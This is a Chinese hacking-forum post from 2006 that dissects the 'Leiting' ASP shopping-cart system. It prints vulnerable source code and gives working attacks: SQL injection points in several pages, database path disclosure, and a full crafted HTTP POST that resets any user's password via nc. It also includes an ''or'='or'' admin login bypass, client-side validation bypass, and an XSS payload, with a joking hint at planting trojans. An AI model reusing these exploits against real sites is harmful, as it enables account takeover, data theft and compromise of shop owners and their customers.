史萊姆論壇

返回   史萊姆論壇 > 教學文件資料庫 > Hacker/Cracker 及加解密技術文件
忘記密碼?
論壇說明 標記討論區已讀

歡迎您來到『史萊姆論壇』 ^___^

您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的!

請點擊這裡:『註冊成為我們的一份子!』

Google 提供的廣告


 
 
主題工具 顯示模式
舊 2006-05-25, 03:39 PM   #1
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設 軟體 - 霸王背後的脆弱——完全解剖雷霆購物系統

霸王背後的脆弱——完全解剖雷霆購物系統
x-key[S.H.C]
軍訓回來很是無聊,看到本機的英特爾分公司用的是一個叫雷霆購物系統的整站程序,雷霆購物系統是國內一個使用比較廣泛的購物系統,現在,我們就來看看它的安全性究竟如何吧!從網上下載7.08最新版的雷霆購物系統,現在我們來分析程式碼!!
一、SQL注入漏洞
我們先來看看vpro.asp文件的部分漏洞程式碼:
<%
dim id
id=request.QueryString("id")
dim prename,company,intro,predate,graph2,description,remarks,price
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from product where id="&id,conn,1,3
rs("viewnum")=rs("viewnum")+1
rs.update
%>
sub.asp文件的漏洞程式碼:
sortsid=request.querystring("nid")
if Not isempty(request("page")) then
currentPage=Cint(request("page"))
else
currentPage=1
end if
set rs=server.CreateObject("adodb.recordset")
rs.open "select pagenum,name,mark,vipprice,discount,score,id,author,productdate,price2,price1,discount,pic from product where sortsid="&sortsid&" order by adddate desc",conn,1,1
還有rank.asp文件的漏洞程式碼:
dim id,action
action=request.QueryString("action")
id=request.QueryString("id")
set rs=server.CreateObject("adodb.recordset")
rs.open "select id,name,rank,ranknum from product where id="&id,conn,1,3
參數全都沒有做過濾,用普通的注入工具就能輕鬆注入。如圖1所顯示:
Search.asp這個文件我開始還以為是搜尋頁面,但是當我細讀程式碼後,發現原來reseach.asp才是真正的搜尋文件,其中又這樣一段程式碼:
if name<>"" then
sql=sql&"and name like '%"&name&"%' "
end if
if author<>"" then
sql=sql&"and author like '%"&author&"%' "
end if
if manufacturer<>"" then
sql=sql&"and mark like '%"&manufacturer&"%' "
end if
if code<>"" then
sql=sql&"and categoryid like '%"&code&"%' "
這就是傳統的填字遊戲!!因為它在進階搜尋頁面作了java script過濾,所以我們要用nc提交來進行cookies注入。但我們也可以在快速搜尋頁面提交:「504%』注入語句』%504」就能注入了,抓包然後把位址放在NBSI裡就能注入了,因為我的IIS有點問題,所有就沒深入測試。
二、爆庫
資料庫連接文件conn.asp並沒有加入容錯語句On Error Resume Next我們隨便找一個帶參數的位址,如:http://www.hackerxfiles.net/vpro.asp...2所顯示:
三、cookies欺騙漏洞
Forget.asp是密碼找回文件文件,repws.asp是修改密碼文件,我們來看看它的部分程式碼:
<%
if request("username")="" then
call MsgBox("非法使用!","Back","None")
response.end
end if
dim tmp
set rs=server.CreateObject("adodb.recordset")
'提交修改密碼
if not isempty(request("SubmitRePws")) then
if request("password")<>request("password2") then call MsgBox("再次輸入密碼不一致!","Back","None")
rs.open "select password from [user] where username='"&trim(request("username"))&"'",conn,1,3
rs("password")=md5(trim(request("password2")))
rs.update
rs.close
call MsgBox("您的密碼取回成功,請登入!","GoUrl","login.asp")
response.end
end if
rs.open "select answer from [user] where username='"&trim(request("username"))&"' ",conn,1,1
tmp=trim(rs("answer"))
rs.close
if tmp<>md5(request("answer")) then
call Msgbox("對不起,您輸入的問題答案不正確","Back","None")
response.end
end if
set rs=nothing
%>
哈哈,笑了吧!我們現在來構造資料包:
POST /lt/repws.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost/lt/repws.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
Host: localhost
Content-Length: 72
Connection: Keep-Alive
快取-Control: no-cache
Cookie: ASPSESSIONIDQGQGQXOO=IFKFCOFAPEOINKPNGDEJEKOF
password=121212&password2=121212&SubmitRePws=%CC%E1%BD%BB&username=x-key
修改就把ueername和password、possword2還有Content-Length修改一下就行了,其他的都不用改。我們現在用nc提交:nc localhost 80<1.txt>1.htm,如圖3所顯示,然後我們執行一下1.htm,就會看到圖4的訊息框了!
四、跨站漏洞
註冊文件reg.asp只是在頁面表面用了java script做了過濾,我們可以把它儲存到本機,然後移除java script驗證就能註冊了哈哈,註冊的所有參數都完全沒有做過濾哦!!在裡面添任何東西都可以,但是這又有什麼用呢?那麼這就是要看你的社會工程學了。
我們來看看留言本的login.asp的漏洞程式碼:sqlchk="select * from admin where admin='" & Username & "' and password='" & password & "'"哈哈,用傳統的』or』=』or』就能進入了,但是,頁面做了java script驗證,但是這個驗證就能阻止我們嗎?哈哈,當然不能,繞過java script驗證的方法前面已經講過了,這裡就不重複了!
我們只要先抓包,然後用nc這樣提交就行了nc localhost 80<1.txt>1.htm好了,現在我們就可以開啟1.htm了!!
我們再來看看write.asp文件,我們開啟該頁面在「電子郵件」或者「個人主頁」中輸入跨站程式碼:"><script>alert("x-key")</script><",就能看到我們想要的效果了!如果我們再勾上「只有斑竹才可以看」,哈哈,掛個馬什麼的不就……
五、最後的總結
其實雷霆購物系統應該還有很多漏洞的,但是由於時間問題,我就不再說了,留給大家一個課後作業!哈哈!!88!!
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次
 


主題工具
顯示模式

發表規則
不可以發文
不可以回覆主題
不可以上傳附加檔案
不可以編輯您的文章

論壇啟用 BB 語法
論壇啟用 表情符號
論壇啟用 [IMG] 語法
論壇禁用 HTML 語法
Trackbacks are 禁用
Pingbacks are 禁用
Refbacks are 禁用


所有時間均為台北時間。現在的時間是 04:08 AM


Powered by vBulletin® 版本 3.6.8
版權所有 ©2000 - 2024, Jelsoft Enterprises Ltd.


SEO by vBSEO 3.6.1